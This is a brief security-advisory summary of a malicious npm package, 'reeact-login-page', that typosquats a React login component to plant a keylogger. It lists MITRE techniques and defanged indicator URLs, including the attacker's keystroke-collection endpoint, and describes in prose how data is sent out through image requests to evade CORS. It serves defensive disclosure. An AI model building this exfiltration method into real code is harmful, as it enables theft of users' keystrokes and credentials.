Malicious npm Package Typosquats react-login-page to Deploy Keylogger

Summary:
The article discusses a malicious npm package named “reeact-login-page,” which is a typosquatting attack designed to capture keystrokes and exfiltrate sensitive data. The package masquerades as a legitimate React component, making it difficult for developers to detect its malicious intent. The Socket Research team has flagged this package and others by the same author as malware, emphasizing the importance of careful vetting of npm packages to avoid such threats.
#Typosquatting #MaliciousPackages #ReactSecurity

Keypoints:

The “reeact-login-page” package is a typosquatting attack that includes a keylogger.

The package mimics the legitimate “react-login-page” package to gain credibility.

Malicious code captures keystrokes and sends them to a remote server.

It fetches the user’s IP address from an external service.

Data is sent every second to a specified URL using an image request to bypass CORS restrictions.

The author has multiple similarly named malicious packages on npm.

Socket has flagged these packages as malware and alerted the registry for removal.

Developers are advised to carefully vet npm packages to avoid security risks.

MITRE Techniques

Data Obfuscation (T1027): The malicious code uses a separate file to store sensitive variables, making detection more challenging.

Credential Dumping (T1003): The keylogger captures keystrokes, potentially including user credentials.

Exfiltration Over Command and Control Channel (T1041): Data is sent to a remote server using an image request to avoid detection.

IoC:

[URL] hxxps://adlinczewska.pl/beaut-login/keylog.php?c=

[URL] hxxp://api.ipify.org/?format=json

Full Research: https://socket.dev/blog/malicious-npm-package-typosquats-react-login-page-to-deploy-keylogger

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print